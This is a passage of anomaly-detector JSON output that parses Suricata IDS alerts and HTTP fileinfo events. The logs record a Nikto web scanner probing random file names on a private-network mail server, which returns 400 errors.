"/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46908, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.00RelNotes", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.307877, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46908, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2147479336955668,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2147479336955668, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80", "/parser/model/time": 1583349514.310209, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant 
character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46910, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.310454, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":281440600897230,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46910, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":281440600897230,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 281440600897230, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46912 -> 192.168.10.154:80", "/parser/model/time": 1583349514.31217, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46912, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.312371, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46912, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1737271305486500, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 